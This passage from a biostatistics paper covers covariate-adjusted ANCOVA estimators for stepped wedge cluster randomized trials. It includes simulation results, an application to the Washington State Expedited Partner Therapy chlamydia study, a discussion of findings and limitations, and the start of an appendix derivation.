AN III & -0.006 & 0.079 & 0.105 & 0.103 & 0.093 & 0.934 & 0.900 \\ & AN IV & -0.006 & 0.085 & 0.110 & 0.093 & 0.081 & 0.880 & 0.834 \\ \hline 60 & UN & -0.005 & 0.085 & 0.095 & 0.113 & 0.107 & 0.975 & 0.968 \\ & AN I & -0.001 & 0.054 & 0.070 & 0.089 & 0.084 & 0.982 & 0.975 \\ & AN II & -0.001 & 0.059 & 0.074 & 0.091 & 0.087 & 0.983 & 0.975 \\ & AN III & 0.001 & 0.052 & 0.068 & 0.074 & 0.070 & 0.966 & 0.955 \\ & AN IV & 0.002 & 0.055 & 0.070 & 0.070 & 0.067 & 0.952 & 0.930 \\ \hline 120 & UN & -0.001 & 0.062 & 0.070 & 0.078 & 0.076 & 0.967 & 0.964 \\ & AN I & -0.001 & 0.040 & 0.053 & 0.062 & 0.061 & 0.977 & 0.973 \\ & AN II & -0.001 & 0.044 & 0.056 & 0.064 & 0.062 & 0.977 & 0.974 \\ & AN III & 0.001 & 0.038 & 0.051 & 0.052 & 0.051 & 0.938 & 0.926 \\ & AN IV & 0.001 & 0.039 & 0.052 & 0.051 & 0.050 & 0.931 & 0.925 \\ \hline \end{tabular} \end{table} Table 3: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study I comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-10} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.012 & 0.149 & 0.171 & 0.210 & 0.171 & 0.963 & 0.923 \\ & AN I & 0.005 & 0.096 & 0.126 & 0.165 & 0.135 & 0.980 & 0.954 \\ & AN II & 0.015 & 0.109 & 0.137 & 0.162 & 0.134 & 0.967 & 0.930 \\ & AN III & 0.004 & 0.092 & 0.124 & 0.135 & 0.111 & 0.954 & 0.917 \\ & AN IV & 0.030 & 0.103 & 0.132 & 0.115 & 0.092 & 0.896 & 0.808 \\ \hline 30 & UN & -0.014 & 0.119 & 0.134 & 0.157 & 0.140 & 0.971 & 0.946 \\ & AN I & 0.001 & 0.078 & 0.101 & 0.125 & 0.111 & 0.974 & 0.963 \\ & AN II & 0.004 & 0.088 & 0.110 & 0.125 & 0.113 & 0.964 & 0.948 \\ & AN III & 0.002 & 0.074 & 0.098 & 0.103 & 0.093 & 0.951 & 0.934 \\ & AN IV & 0.014 & 0.081 & 0.103 & 0.094 & 0.082 & 0.917 & 0.872 \\ \hline 60 & UN & -0.001 & 0.079 & 0.089 & 0.109 & 0.103 & 0.980 & 0.975 \\ & AN I & 0.005 & 0.052 & 0.066 & 0.088 & 0.083 & 0.986 & 0.984 \\ & AN II & 0.008 & 0.057 & 0.070 & 0.090 & 0.085 & 0.983 & 0.978 \\ & AN III & 0.005 & 0.050 & 0.066 & 0.073 & 0.069 & 0.965 & 0.958 \\ & AN IV & 0.012 & 0.052 & 0.067 & 0.070 & 0.066 & 0.953 & 0.942 \\ \hline 120 & UN & 0.001 & 0.058 & 0.066 & 0.076 & 0.074 & 0.969 & 0.967 \\ & AN I & 0.003 & 0.039 & 0.051 & 0.061 & 0.060 & 0.975 & 0.970 \\ & AN II & 0.003 & 0.043 & 0.054 & 0.063 & 0.061 & 0.972 & 0.967 \\ & AN III & 0.004 & 0.037 & 0.049 & 0.051 & 0.050 & 0.947 & 0.940 \\ & AN IV & 0.005 & 0.038 & 0.050 & 0.050 & 0.049 & 0.940 & 0.935 \\ \hline \end{tabular} \end{table} Table 4: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study I comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. models. The same randomization scheme in simulation study I is maintained, and the same covariate-generating processes for \(X_{ij1}\) and \(X_{ijk2}\) are considered. However, we additionally consider the following four additional scenarios to simulate the potential outcomes: 1. Scenario I: potential outcomes are not affected by the cluster-period size, where \[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{ 2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+0.5X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] with \(c_{i}\sim\mathcal{N}(0,0.1)\) and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). In this case, the three estimands have the same value. 2. Scenario II: the true individual treatment effect depends on the period through the period-specific main covariate effect in \(Y_{ijk}(1)\), where \[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^ {2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5( j+1)X_{ij1}+\frac{j+1}{J+2}\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] with \(c_{i}\sim\mathcal{N}(0,0.1)\) and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). 3. Scenario III: the random effects are beyond the simple compound symmetry structure, where \[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^ {2}+c_{i}+b_{ij}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5X _{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3}+d_{i},\] with \(c_{i}\sim\mathcal{N}(0,0.05)\), \(b_{ij}\sim\mathcal{N}(0,0.05)\), \(d_{i}\sim\mathcal{N}(0,0.1)\), and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). Cluster-period-specific random effects, \(b_{ij}\), and cluster random effects, \(d_{i}\), are independent, and independent from other components. In the stepped wedge cluster randomized experiment literature, this correlation structure can be viewed as a combination of the nested exchangeable structure with a random intervention effect (Hooper et al., 2016; Hemming et al., 2018). 4. Scenario IV: the distributions of random effects are non-normal, where \[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^ {2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5 X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] with \(c_{i}\sim\mathcal{CG}(1,0.1)\), a centered gamma distribution with variance 0.1, and \(e_{ijk}\sim\mathcal{CP}(0.9)\), a centered Poisson distribution with variance 0.9. We consider two cases where the sample size is relatively small (\(I=18\)) and large (\(I=60\)). Same as simulation study I, we conduct 1,000 simulation replications with models (3)-(6) fitted with \(X_{ij1}\), \(X_{ijk2}\) but without further adjusting for cluster-period size; results for all metrics (BIAS, RMSE, ESE, ASE) and the empirical coverage percentages of 95% confidence intervals (CIs) using the DB and CRSE estimators are analogously obtained. Here, we focus on presenting the relative efficiency (RE) of each ANCOVA estimator to the unadjusted estimator in Figure 1 and 2 (a larger RE indicates that the ANCOVA estimator is more efficient in finite samples); more detailed results are available in Web Tables 2-7 of Web Appendix C. As expected, the unadjusted estimator is less efficient than the ANCOVA estimators, confirming benefits of covariate adjustment under staggered cluster rollout. When the the number of clusters is small (\(I=18\)), ANCOVA I and III exhibit higher RE than the other estimators. Comparing across the four ANCOVA estimators, estimators not including period-specific effects (ANCOVA I and III) demonstrate higher RE, likely because the ANCOVA II and IV estimators require estimating a significantly larger number of model parameters, which can lead to finite-sample efficiency loss. Comparing between the two pairs of ANCOVA estimators, i.e., ANCOVA I vs. III, and II vs. IV, we found that the estimator including interactions between treatment indicators and covariates can improve RE in most settings, except for estimating \(\tau^{period}\) and \(\tau^{cell}\) under scenario II, where ANCOVA I has higher RE than ANCOVA III. This is in slight contradiction to the earlier results found for individually randomized experiments (Lin, 2013), where the fully-interacted model is always asymptotically more efficient. With more clusters (\(I=60\)), Figure 2 shows that estimators including treatment-by-covariate interactions outperform their counterparts without interactions in most simulation settings, endorsing existing results for parallel-arm cluster randomized experiments. In particular, ANCOVA IV, the estimator assisted by the most-richly parameterized working model, yields the highest RE in Scenario II, where the true individual treatment effect depends on the period through the period-specific main covariate effect in \(Y_{ijk}(1)\). This is likely because ANCOVA IV most accurately reflects the true data-generating process where period-specific covariate effects and treatment-by-covariate interactions are simultaneously accounted for by the model structure (and such structures are estimable with 60 clusters). Overall, if a sufficient number of clusters are present, we recommend the ANCOVA III and IV for efficiency considerations. If only a limited number of clusters are present, the use of ANCOVA III does not appear to much compromise finite-sample efficiency under a relatively parsimonious working model parameterization, and may be preferred. Finally, we present in Web Figures 2-3 of Web Appendix D the relative efficiency results when \(N_{ij}\) is included as an additional covariate in the ANCOVA working models. (More detailed results are available in Web Tables 11-16 of Web Appendix D.) While the overall observations are similar to the above simulations without adjusting for \(N_{ij}\), a notable difference is that with \(I=18\), ANCOVA IV becomes the least efficient and can even be substantially less efficient than the unadjusted estimator (occasionally the RE = 0.5). This suggests that one should caution the adjustment for cluster-period size via ANCOVA IV when limited number of clusters cannot support the large number of parameters that need to be estimated for this working model. ## 5 Application to the Washington State Expedited Partner Therapy study We illustrate the application of model-assisted estimators by analyzing of the Washington State Expedited Partner Therapy (EPT) study. The Washington State EPT study is a stepped wedge cluster randomized experiment designed to evaluate the effectiveness of an expedited patient-delivered partner notification strategy, which aims to treat the sex partners of persons with sexually transmitted infec Figure 1: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=18\). tions without their medical evaluation, and thus increase partner treatment and decrease gonorrhea and chlamydia reinfection rates (Golden et al., 2015). The trial was conducted from October 2007 to August 2009, with four waves (1 pre-rollout period, 3 rollout periods and 1 post-rollout period) separated by six-month intervals. A total of 22 local health jurisdictions (LHJs, i.e., clusters) were randomly assigned to the four different treatment adoption times and provide individual-level outcome data that was measured based on distinct sentinel women sampled during each period. In each of the three rollout periods, six previously untreated LHJs were given the intervention, and in the post-rollout period, the remaining four untreated LHJs were assigned to the treatment arm. We focus on the binary outcome, Chlamydia infection status, in this analysis, with value equal to 1 if the sentinel woman reports Chlamydia at the time of assessment and 0 otherwise; therefore all estimands are interpreted on the risk difference scale. The cluster-period (cell) size \(N_{ij}\) during rollout ranges from 41 to 1553, with a standard deviation of 331 (see Figure 1 in Li et al. (2022) and Tian et al. (2022) for a detailed depiction of cluster-period sizes over the pre-rollout, rollout, and post-rollout periods). Due to the substantial variation in cluster sizes, informative cluster size may not be ruled out and we are interested in quantifying the three different estimands introduced in Table 1. We apply the undjusted estimator and the proposed model-assisted ANCOVA estimators (ANCOVA I-IV) to the Washington State EPT study data by fitting models (3)-(6), with two covariates--age measured at baseline, and an LHJ-level Chlamydia prevalence measured at baseline--that are believed to have good prognostic values. Estimation results from various estimators with standard errors obtained from two different approaches are given in Table 5. Results adjusted for cluster-period size as an additional covariate are presented in Web Table 17 of Web Appendix D and are generally similar. Overall, the results indicate that the intervention implemented in the Washington State EPT study shows a beneficial effect in reducing the likelihood of Chlamydia, as the signs of all point estimates are negative. The estimates have a clear ordering such that \(|\widehat{\tau}^{cell}|>|\widehat{\tau}^{period}|>|\widehat{\tau}^{ind}|\), suggesting the largest effect may be observed once we consider an average at the cell level. For each one of the three estimands, the unadjusted estimator yields the largest standard error estimate, and the ANCOVA I-IV estimators appear to improve the estimation precision with a smaller standard error estimate. Our simulations show that the ANCOVA III estimator demonstrates the highest estimation efficiency under most scenarios, and the DB approach provides relatively accurate estimation of the uncertainty for this approach; therefore we primarily interpret this result here. For the individual-average treatment effect \(\tau^{ind}\), the point estimate is \(-0.0087\); therefore after averaging over all sentinel women during rollout, Figure 2: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=60\). the EPT intervention can prevent 87 positive Chlamydia infection cases per 10 thousand women during a six-month interval (with statistical significance at the 10% level). For the period-average treatment effect \(\tau^{period}\), the point estimate is \(-0.0111\); therefore during an average rollout period, after averaging over all sentinel women, the EPT intervention can prevent 111 positive Chlamydia infection cases per 10 thousand women (with statistical significance at the 5% level). For the cell-average treatment effect (\(\tau^{cell}\)), the point estimate is \(-0.0142\); therefore after averaging all cluster-period cells during rollout, the EPT intervention can prevent 142 positive Chlamydia infection cases per 10 thousand women. These results generally corroborate the model-based analysis results in Golden et al. (2015) and Li et al. (2022), even though the previous analyses did not address variations in estimands due to potentially informative cluster-period size. ## 6 Discussion In this article, we have studied model-assisted analyses of stepped wedge cluster randomized experiments and elucidated considerations on estimands, covariate adjustment as well as statistical inference strategies. Specifically, we examined a class of weighted average treatment effects as nonparametric estimands, where three interpretable members can be obtained by selecting specific weights. Leveraging the ANCOVA working models, a class of estimators were developed to exploit baseline covariates information and improve estimation efficiency over the conventional unadjusted difference-in-means estimators. Asymptotic results for proposed estimators were established via finite population Central Limit Theorems, i.e., results that confirm that the proposed estimators are consistent and asymptotically normal as the number of clusters increases to infinity. We have also conducted simulation studies to evaluate finite-sample properties of the ANCOVA estimators and compare their performances to inform practical recommendations. To the best of our knowledge, this is the first effort that systematically investigates model-robust causal inference methods for stepped wedge cluster randomized experiments that analyze individual-level data. While it is generally challenging to analytically compare the four ANCOVA models under the staggered rollout randomization designs, we seek to conduct numerical experiments to inform model choices in practice. The following main messages are generated from our simulation evaluations. (1) All five estimators, including the unadjusted estimator, are asymptotically unbiased, where, as the number of clusters increases, the relative biases decrease. This indicates that including covariates in the ANCOVA models does not compromise bias, as long as the correct weights are specified to target a specific estimand. (2) The DB variance estimator can be conservative for the unadjusted, the ANCOVA I and \begin{table} \begin{tabular}{l c c c c c c} \hline \hline & \multicolumn{2}{c}{\(\tau^{ind}\)} & \multicolumn{2}{c}{\(\tau^{period}\)} & \multicolumn{2}{c}{\(\tau^{cell}\)} \\ \cline{2-7} Estimators & DB & CRSE & DB & CRSE & DB & CRSE \\ \hline Unadjusted & -0.0032 & -0.0032 & -0.0065 & -0.0065 & -0.0137 & -0.0137 \\ & (0.0049) & (0.0044) & (0.0053) & (0.0049) & (0.0102) & (0.0093) \\ ANCOVA I & -0.0068 & -0.0068\({}^{*}\) & -0.0095\({}^{*}\) & -0.0095\({}^{*}\) & -0.0140 & -0.0140 \\ & (0.0045) & (0.0040) & (0.0049) & (0.0043) & (0.0096) & (0.0087) \\ ANCOVA II & -0.0066 & -0.0066\({}^{*}\) & -0.0092\({}^{*}\) & -0.0092\({}^{*}\) & -0.0143 & -0.0143 \\ & (0.0044) & (0.0040) & (0.0048) & (0.0043) & (0.0096) & (0.0087) \\ ANCOVA III & -0.0087\({}^{*}\) & -0.0087\({}^{*}\) & -0.0111\({}^{**}\) & -0.0111\({}^{**}\) & -0.0140 & -0.0140 \\ & (0.0045) & (0.0043) & (0.0044) & (0.0041) & (0.0095) & (0.0087) \\ ANCOVA IV & -0.0037 & -0.0037 & -0.0071\({}^{*}\) & -0.0071 & -0.0142 & -0.0142 \\ & (0.0039) & (0.0049) & (0.0040) & (0.0045) & (0.0094) & (0.0090) \\ \hline \hline \multicolumn{7}{l}{\({}^{**}\)Statistically significant at the 5% level, two-tailed test.} \\ \multicolumn{7}{l}{\({}^{*}\)Statistically significant at the 10% level, two-tailed test.} \\ \end{tabular} \end{table} Table 5: Estimated average treatment effects on the risk difference scale and their standard errors for the Washington State EPT study. Standard errors are given in parentheses. DB = design-based standard error. CRSE = cluster-robust standard error. II estimators. While the DB approach demonstrates desired estimation accuracy for the ANCOVA III estimator regardless of sample size, but it often underestimates the variance of the ANCOVA IV estimator when the sample size is small. (3) The CRSE variance estimator yields accurate estimates for the unadjusted, the ANCOVA I and II estimators with a limited number of clusters, and can be conservative in larger samples. For ANCOVA III and IV, the CRSE estimator tends to underestimate the true variance, though the degree of underestimation diminishes when the sample size increases. (4) The unadjusted estimator generally exhibits the lowest RE compared to ANCOVA, which aligns with the result from Lin (2013) and Su and Ding (2021) that adjusting for covariates increases estimation efficiency in individually randomized experiments and parallel-arm cluster randomized experiments. (5) Comparing the estimators assisted by models including treatment-by-covariate interactions with their counterparts without interactions, the fully-interacted estimators show higher RE in most settings. However, in a few simulation situations, the model without interactions give better performances. This finding aligns with results in Su and Ding (2021) that including interactions in analyzing individual-level data does not always increase estimation efficiency in parallel-arm cluster randomized experiments. (6) With a limited number of clusters, estimators assisted by more parsimonious models, i.e., ANCOVA I and III, tend to give better performances in terms of estimation efficiency. When the sample size increases, estimators assisted by richly parameterized models, especially ANCOVA IV, demonstrate higher estimation efficiency. (7) Adjusting for cluster-period size as an additional covariate in ANCOVA models can improve estimation efficiency when the number of clusters is large. With a small number of clusters, however, including cluster-period size can lead to a less efficient estimator under ANCOVA IV compared to the unadjusted estimator. Summarizing from these evidence, we find in general, if the number of clusters is limited, our observation is that ANCOVA III coupled with the DB variance estimator can be adequate for statistical inference. There are several potential limitations of our current study. First, we have focused on estimators assisted by ANCOVA models without the duration effects. When the true treatment effect depends on the length of exposure, Kenny et al. (2022) and Maleyeff et al. (2022) showed that the model assuming a constant treatment effect can lead to an effect with an opposite direction from the true effect. Similar observations have also been discussed in Sun and Abraham (2021) for different-in-difference designs. It may be possible to modify our ANCOVA working models to target a new class of duration-specific weighted average treatment effect, and we leave this development to future work. Second, our finite population framework and estimands currently do not explicitly address the missing potential outcomes during the pre-rollout and post-rollout periods, as treatment positivity is technically violated by construction of the stepped wedge design in those periods. It may be intriguing to expand our estimand definitions to accommodate those periods, but identification would necessarily require additional assumptions (either structural or modeling) to extrapolate from the rollout periods to the pre- and post-rollout periods. For example, the conventional linear mixed models (Li et al., 2021) consider random effects at the cluster and cluster-period levels to implicitly impute the unobserved potential outcomes during all study periods, and have been demonstrated to be model-robust under certain structural assumptions for parallel-arm cluster randomized experiments (Wang et al., 2021, 2022). This may suggest that alternative, mixed-effects model formulations that leverage observed data from the pre- and post-rollout periods may yield estimators to target equally-interpretable estimands with improved efficiency over the estimators studied in this work. The exact identification conditions, however, for mixed-effects models to achieve model-assisted causal inference in stepped wedge designs are yet to be formalized, and will be pursued in our future research. ## Web Appendix A1 Proof of Lemma 1 ### Web Appendix A1.1 Anova I Here we adopt the approach proposed in Schochet et al. (2021) by centering the treatment status indicator, which simplifies the derivation process, without altering the interpretation of the parameter of interest, \(\tau_{j_{1}}\) and the properties of its estimator. Specifically, we consider the centered treatment status indicator, \(\widetilde{Z}_{ij}=Z_{ij}-w_{j}^{1}/w_{j}\), where \(w_{j}^{1}/w_{j}\) is only related to rollout period \(j\) and is fixed after the randomization is carried out. Therefore, the centering operation here does not altering the interpretation or the estimate of \(\tau_{j}\). Using this approach, the ANCOVA I model can be alternatively represented as: \[Y_{ijk}=\sum_{j^{\prime}=1}^{J}\beta_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}+ \sum_{j^{\prime}=1}^{J}\tau_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}\widetilde{ Z}_{ij^{\prime}}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+e_{ijk},\] where \(\mathbb{I}_{ijk,j^{\prime}}\) is an indicator variable introduced to facilitate derivation, which is equal to 1 if \(j^{\prime}\) is the same as the rollout period \(j\), and 0 otherwise. This re-expression using \(\mathbb{I}_{ijk,j^{\prime}}\) allows us to easily form design matrices and is thus continuously adopted for the other ANCOVA models in the Web Appendix. The derivation of \(\widehat{\tau}_{j}\) largely follows Section A.3.1 in the Web Appendix of Schochet et al. (2021). We give the detailed derivation here and readers could also refer to Schochet et al. (2021) for specific steps on ANCOVA I. Under ANCOVA I, we have the following design matrix \[\mathbf{D}_{i}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1} _{N_{ij}}&\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}&\widetilde{\mathbf{X}}_{i}\end{array} \right),\] where '\(\otimes\)' is the block diagonal operator, \(\widetilde{\mathbf{X}}_{i}\) is the matrix with the corresponding row being \(\widetilde{\mathbf{X}}_{ijk}\). Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{c}\otimes_{j=1}^{J} \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\\ \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\end{array}\right),\ \ \mathbf{W}_{i}=\otimes_{j=1}^{J}\mathbf{W}_{ij},\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \mathbf{Y}_{i}=\left( \begin{array}{c}\mathbf{Y}_{i1}\\ \vdots\\ \mathbf{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1},\ldots,\widehat{\tau}_{J},\widehat{\beta}_{1},\ldots, \widehat{\beta}_{J},\widehat{\gamma}^{\prime})^{\prime}=\left(\sum_{i=1}^{I} \mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\right)^{-1}\left(\sum_{i=1}^{I}\mathbf{D}_ {i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\right)\). \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\sum_{i=1}^{I}\left( \begin{array}{cccc}\otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}^{2}\mathbf{1}_{N_{ ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left( \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)& \otimes_{j=1}^{J}\left(\mathbf{\tilde{Z}}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \mathbf{1}_{N_{ij}}\right)&\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij }}^{\prime}\right)\mathbf{W}_{i}\widetilde{\mathbf{X}}_{i}\\ \otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{1}_{N_{ij}}\right)&\left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime} \right)\mathbf{W}_{i}\widetilde{\mathbf{X}}_{i}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\left(\otimes_{j=1}^{J}\widetilde{Z}_ {ij}\mathbf{1}_{N_{ij}}\right)&\widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\left( \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}\right)&\widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W} _{i}\widetilde{\mathbf{X}}_{i}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&&0&&&\frac{w_{ 1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{ 0}\right)\\ &&\ddots&&\ddots&&\vdots\\ &&\frac{w_{J}^{0}w_{1}^{1}}{w_{J}}&&&0&\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&&w_{1}&&0_{p}^{0}\\ &&\ddots&&\ddots&&\vdots\\ &&0&&w_{J}&&\mathbf{0}_{p}^{0}\\ \hline\frac{w_{1}^{2}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline {\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p}& \cdots&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}=\sum_{i=1}^{I}\left( \begin{array}{c}\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\end{array}\right)=\left( \begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}} _{ijk}^{\prime}\end{array}\right).\] The inversion of \(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\) can be carried out by first writing the matrix in four blocks: \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\left(\begin{array}{cc} \mathbf{A}&\mathbf{B}\\ \mathbf{C}&\mathbf{D}\end{array}\right),\] where the component matrices are \[\mathbf{A}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{i}^{1}}{w_{ j}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right),\ \ \mathbf{B}=\left(\begin{array}{c} \frac{w_{j}^{0}w_{i}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X }}_{1}^{0}\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right),\] \[\mathbf{C}=\left(\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime},\cdots,\frac{w_{J}^{0}w_{J}^{1}}{w_ {J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}, \mathbf{0}_{p},\cdots,\mathbf{0}_{p}\right),\] \[\mathbf{D}=\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}.\] Then we use the following block matrix inversion formula: \[\left(\begin{array}{cc}\mathbf{A}&\mathbf{B}\\ \mathbf{C}&\mathbf{D}\end{array}\right)^{-1}=\left(\begin{array}{cc}(\mathbf{A}-\mathbf{B} \mathbf{D}^{-1}\mathbf{C})^{-1}&-\mathbf{A}^{-1}\mathbf{B}(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1 }\\ -\mathbf{D}^{-1}\mathbf{C}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&(\mathbf{D}-\mathbf{C}\mathbf{A}^{- 1}\mathbf{B})^{-1}\end{array}\right).\] For simplicity, we derive result for \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}.\] Based on matrix inversion, \[\widehat{\mathbf{\tau}}=\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array} \right)\left(\begin{array}{cc}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&-\mathbf{A}^ {-1}\mathbf{B}(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}\end{array}\right)\left( \begin{array}{c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ 